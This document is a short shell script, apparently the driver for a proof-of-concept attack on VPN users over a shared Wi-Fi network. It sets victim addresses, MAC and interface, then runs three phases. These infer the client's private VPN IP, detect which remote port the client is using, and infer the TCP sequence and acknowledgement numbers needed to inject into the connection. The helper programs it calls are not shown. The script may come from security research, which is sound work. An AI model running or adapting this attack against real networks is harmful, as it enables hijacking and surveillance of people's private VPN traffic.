REMOTE_ADDR=$1 REMOTE_PORT=80 VICTIM_WLAN_ADDR=192.168.12.58 # vpn client public ip WLAN_GATEWAY=192.168.12.1 # address of local network gateway VICTIM_PRIV_NET=10.7.2.0 # nord uses 10.7.2.x typically PRIV_NETMASK=255.255.255.0 REQUEST_SIZE=529 DEST_MAC=a4:34:d9:53:92:c4 INTERFACE=wlp1s0 echo "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 1 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo `date` echo "attempting to infer client's private VPN address.." cd ../first_phase PRIV_IP="$(./send_p1 $DEST_MAC $VICTIM_PRIV_NET $PRIV_NETMASK $WLAN_GATEWAY $INTERFACE)" echo "phase 1 client private IP: ${PRIV_IP}" echo "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 2 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo `date` echo "determining if client is talking to ${REMOTE_ADDR} on any port.." cd ../sec_phase VPORT="$(./send_p2 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC)" echo "phase 2 port result: ${VPORT}" echo "\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~~~~~~~~~ PHASE 3 ~~~~~~~~~~~\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~" echo `date` echo "beginning phase 3 to infer sequence and ack numbers needed to inject.." cd ../third_phase ./send_p3 $REMOTE_ADDR $REMOTE_PORT $VICTIM_WLAN_ADDR $PRIV_IP $DEST_MAC $VPORT $REQUEST_SIZE echo `date`